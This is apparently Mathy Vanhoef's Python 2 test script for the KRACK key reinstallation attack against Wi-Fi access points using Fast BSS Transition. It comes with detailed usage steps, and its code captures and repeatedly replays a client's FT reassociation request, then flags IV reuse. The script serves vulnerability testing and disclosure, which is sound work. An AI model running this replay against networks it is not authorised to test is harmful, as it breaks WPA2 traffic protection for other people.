krack-ft-test.py 10 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283
  1. #!/usr/bin/env python2
  2. # Copyright (c) 2017, Mathy Vanhoef <Mathy.Vanhoef@cs.kuleuven.be>
  3. #
  4. # This code may be distributed under the terms of the BSD license.
  5. # See LICENSE for more details.
  6. import logging
  7. logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
  8. from scapy.all import *
  9. from libwifi import *
  10. import sys, socket, struct, time, subprocess, atexit, select
  11. from datetime import datetime
  12. IEEE_TLV_TYPE_RSN = 48
  13. IEEE_TLV_TYPE_FT = 55
  14. IEEE80211_RADIOTAP_RATE = (1 << 2)
  15. IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
  16. IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
  17. IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)
  18. #TODO: - Merge code with client tests to avoid code duplication (including some error handling)
  19. #TODO: - Option to use a secondary interface for injection + WARNING if a virtual interface is used + repeat advice to disable hardware encryption
  20. #TODO: - Test whether injection works on the virtual interface (send probe requests to nearby AP and wait for replies)
  21. # FIXME: We are repeating the "disable hw encryption" script to client tests
  22. USAGE = """{name} - Tool to test Key Reinstallation Attacks against an AP
  23. To test wheter an AP is vulnerable to a Key Reinstallation Attack against
  24. the Fast BSS Transition (FT) handshake, take the following steps:
  25. 1. The hardware encryption engine of some Wi-Fi NICs have bugs that interfere
  26. with our script. So disable hardware encryption by executing:
  27. ./disable-hwcrypto.sh
  28. This only needs to be done once. It's recommended to reboot after executing
  29. this script. After plugging in your Wi-Fi NIC, use `systool -vm ath9k_htc`
  30. or similar to confirm the nohwcript/.. param has been set. We tested this
  31. with an a TP-Link TL-WN722N and an Alfa AWUS051NH v2.
  32. 2. Create a wpa_supplicant configuration file that can be used to connect
  33. to the network. A basic example is:
  34. ctrl_interface=/var/run/wpa_supplicant
  35. network={{
  36. ssid="testnet"
  37. key_mgmt=FT-PSK
  38. psk="password"
  39. }}
  40. Note the use of "FT-PSK". Save it as network.conf or similar. For more
  41. info see https://w1.fi/cgit/hostap/plain/wpa_supplicant/wpa_supplicant.conf
  42. 3. Try to connect to the network using your platform's wpa_supplicant.
  43. This will likely require a command such as:
  44. sudo wpa_supplicant -D nl80211 -i wlan0 -c network.conf
  45. If this fails, either the AP does not support FT, or you provided the wrong
  46. network configuration options in step 1.
  47. 4. Use this script as a wrapper over the previous wpa_supplicant command:
  48. sudo {name} wpa_supplicant -D nl80211 -i wlan0 -c network.conf
  49. This will execute the wpa_supplicant command using the provided parameters,
  50. and will add a virtual monitor interface that will perform attack tests.
  51. 5. Use wpa_cli to roam to a different AP of the same network. For example:
  52. sudo wpa_cli -i wlan0
  53. > status
  54. bssid=c4:e9:84:db:fb:7b
  55. ssid=testnet
  56. ...
  57. > scan_results
  58. bssid / frequency / signal level / flags / ssid
  59. c4:e9:84:db:fb:7b 2412 -21 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
  60. c4:e9:84:1d:a5:bc 2412 -31 [WPA2-PSK+FT/PSK-CCMP][ESS] testnet
  61. ...
  62. > roam c4:e9:84:1d:a5:bc
  63. ...
  64. In this example we were connected to AP c4:e9:84:db:fb:7b of testnet (see
  65. status command). The scan_results command shows this network also has a
  66. second AP with MAC c4:e9:84:1d:a5:bc. We then roam to this second AP.
  67. 6. Generate traffic between the AP and client. For example:
  68. sudo arping -I wlan0 192.168.1.10
  69. 7. Now look at the output of {name} to see if the AP is vulnerable.
  70. 6a. First it should say "Detected FT reassociation frame". Then it will
  71. start replaying this frame to try the attack.
  72. 6b. The script shows which IVs (= packet numbers) the AP is using when
  73. sending data frames.
  74. 6c. Message "IV reuse detected (IV=X, seq=Y). AP is vulnerable!" means
  75. we confirmed it's vulnerable.
  76. !! Be sure to manually check network traces as well, to confirm this script
  77. !! is replaying the reassociation request properly, and to manually confirm
  78. !! whether there is IV (= packet number) reuse or not.
  79. Example output of vulnerable AP:
  80. [15:59:24] Replaying Reassociation Request
  81. [15:59:25] AP transmitted data using IV=1 (seq=0)
  82. [15:59:25] Replaying Reassociation Request
  83. [15:59:26] AP transmitted data using IV=1 (seq=0)
  84. [15:59:26] IV reuse detected (IV=1, seq=0). AP is vulnerable!
  85. Example output of patched AP (note that IVs are never reused):
  86. [16:00:49] Replaying Reassociation Request
  87. [16:00:49] AP transmitted data using IV=1 (seq=0)
  88. [16:00:50] AP transmitted data using IV=2 (seq=1)
  89. [16:00:50] Replaying Reassociation Request
  90. [16:00:51] AP transmitted data using IV=3 (seq=2)
  91. [16:00:51] Replaying Reassociation Request
  92. [16:00:52] AP transmitted data using IV=4 (seq=3)
  93. """
  94. #### Basic output and logging functionality ####
  95. ALL, DEBUG, INFO, STATUS, WARNING, ERROR = range(6)
  96. COLORCODES = { "gray" : "\033[0;37m",
  97. "green" : "\033[0;32m",
  98. "orange": "\033[0;33m",
  99. "red" : "\033[0;31m" }
  100. global_log_level = INFO
  101. def log(level, msg, color=None, showtime=True):
  102. if level < global_log_level: return
  103. if level == DEBUG and color is None: color="gray"
  104. if level == WARNING and color is None: color="orange"
  105. if level == ERROR and color is None: color="red"
  106. print (datetime.now().strftime('[%H:%M:%S] ') if showtime else " "*11) + COLORCODES.get(color, "") + msg + "\033[1;0m"
  107. #### Man-in-the-middle Code ####
  108. class KRAckAttackFt():
  109. def __init__(self, interface):
  110. self.nic_iface = interface
  111. self.nic_mon = interface + "mon"
  112. self.clientmac = scapy.arch.get_if_hwaddr(interface)
  113. self.sock = None
  114. self.wpasupp = None
  115. self.reset_client()
  116. def reset_client(self):
  117. self.reassoc = None
  118. self.ivs = IvCollection()
  119. self.next_replay = None
  120. def start_replay(self, p):
  121. assert Dot11ReassoReq in p
  122. self.reassoc = p
  123. self.next_replay = time.time() + 1
  124. def process_frame(self, p):
  125. # Detect whether hardware encryption is decrypting the frame, *and* removing the TKIP/CCMP
  126. # header of the (now decrypted) frame.
  127. # FIXME: Put this check in MitmSocket? We want to check this in client tests as well!
  128. if self.clientmac in [p.addr1, p.addr2] and Dot11WEP in p:
  129. # If the hardware adds/removes the TKIP/CCMP header, this is where the plaintext starts
  130. payload = str(p[Dot11WEP])
  131. # Check if it's indeed a common LCC/SNAP plaintext header of encrypted frames, and
  132. # *not* the header of a plaintext EAPOL handshake frame
  133. if payload.startswith("\xAA\xAA\x03\x00\x00\x00") and not payload.startswith("\xAA\xAA\x03\x00\x00\x00\x88\x8e"):
  134. log(ERROR, "ERROR: Virtual monitor interface doesn't seem to pass 802.11 encryption header to userland.")
  135. log(ERROR, " Try to disable hardware encryption, or use a 2nd interface for injection.", showtime=False)
  136. quit(1)
  137. # Client performing a (possible new) handshake
  138. if self.clientmac in [p.addr1, p.addr2] and Dot11Auth in p:
  139. self.reset_client()
  140. log(INFO, "Detected Authentication frame, clearing client state")
  141. elif p.addr2 == self.clientmac and Dot11ReassoReq in p:
  142. self.reset_client()
  143. if get_tlv_value(p, IEEE_TLV_TYPE_RSN) and get_tlv_value(p, IEEE_TLV_TYPE_FT):
  144. log(INFO, "Detected FT reassociation frame")
  145. self.start_replay(p)
  146. else:
  147. log(INFO, "Reassociation frame does not appear to be an FT one")
  148. elif p.addr2 == self.clientmac and Dot11AssoReq in p:
  149. log(INFO, "Detected normal association frame")
  150. self.reset_client()
  151. # Encrypted data sent to the client
  152. elif p.addr1 == self.clientmac and Dot11WEP in p:
  153. iv = dot11_get_iv(p)
  154. log(INFO, "AP transmitted data using IV=%d (seq=%d)" % (iv, dot11_get_seqnum(p)))
  155. if self.ivs.is_iv_reused(p):
  156. log(INFO, ("IV reuse detected (IV=%d, seq=%d). " +
  157. "AP is vulnerable!") % (iv, dot11_get_seqnum(p)), color="green")
  158. self.ivs.track_used_iv(p)
  159. def handle_rx(self):
  160. p = self.sock.recv()
  161. if p == None: return
  162. self.process_frame(p)
  163. def configure_interfaces(self):
  164. log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
  165. # 0. Some users may forget this otherwise
  166. subprocess.check_output(["rfkill", "unblock", "wifi"])
  167. # 1. Remove unused virtual interfaces to start from a clean state
  168. subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
  169. # 2. Configure monitor mode on interfaces
  170. subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
  171. # Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
  172. # sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
  173. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  174. time.sleep(0.5)
  175. subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
  176. subprocess.check_output(["ifconfig", self.nic_mon, "up"])
  177. def run(self):
  178. self.configure_interfaces()
  179. self.sock = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
  180. # Open the wpa_supplicant client that will connect to the network that will be tested
  181. self.wpasupp = subprocess.Popen(sys.argv[1:])
  182. # Monitor the virtual monitor interface of the client and perform the needed actions
  183. while True:
  184. sel = select.select([self.sock], [], [], 1)
  185. if self.sock in sel[0]: self.handle_rx()
  186. if self.reassoc and time.time() > self.next_replay:
  187. log(INFO, "Replaying Reassociation Request")
  188. self.sock.send(self.reassoc)
  189. self.next_replay = time.time() + 1
  190. def stop(self):
  191. log(STATUS, "Closing wpa_supplicant and cleaning up ...")
  192. if self.wpasupp:
  193. self.wpasupp.terminate()
  194. self.wpasupp.wait()
  195. if self.sock: self.sock.close()
  196. def cleanup():
  197. attack.stop()
  198. def argv_get_interface():
  199. for i in range(len(sys.argv)):
  200. if not sys.argv[i].startswith("-i"):
  201. continue
  202. if len(sys.argv[i]) > 2:
  203. return sys.argv[i][2:]
  204. else:
  205. return sys.argv[i + 1]
  206. return None
  207. if __name__ == "__main__":
  208. if len(sys.argv) <= 1 or "--help" in sys.argv or "-h" in sys.argv:
  209. print USAGE.format(name=sys.argv[0])
  210. quit(1)
  211. # TODO: Verify that we only accept CCMP?
  212. interface = argv_get_interface()
  213. if not interface:
  214. log(ERROR, "Failed to determine wireless interface. Specify one using the -i parameter.")
  215. quit(1)
  216. attack = KRAckAttackFt(interface)
  217. atexit.register(cleanup)
  218. attack.run()